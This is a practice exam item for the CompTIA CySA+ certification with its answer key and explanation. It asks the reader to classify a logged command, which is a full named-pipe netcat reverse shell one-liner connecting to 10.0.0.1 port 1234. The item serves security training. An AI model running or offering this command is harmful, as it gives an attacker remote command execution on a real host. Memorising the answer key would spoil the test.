CompTIA CySA+ (CS0-003) — Question 181

A security analyst detected the following suspicious activity:

rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 > tmp/f

Which of the following most likely describes the activity?

Answer options

• A. Network pivoting
• B. Host scanning
• C. Privilege escalation
• D. Reverse shell

Correct answer: D

Explanation

The command sequence indicates the creation of a named pipe and establishes a reverse shell connection to an external IP, which allows remote command execution. Options A, B, and C do not accurately reflect this behavior since they pertain to different types of network and system attacks that do not involve a direct shell access via a reverse connection.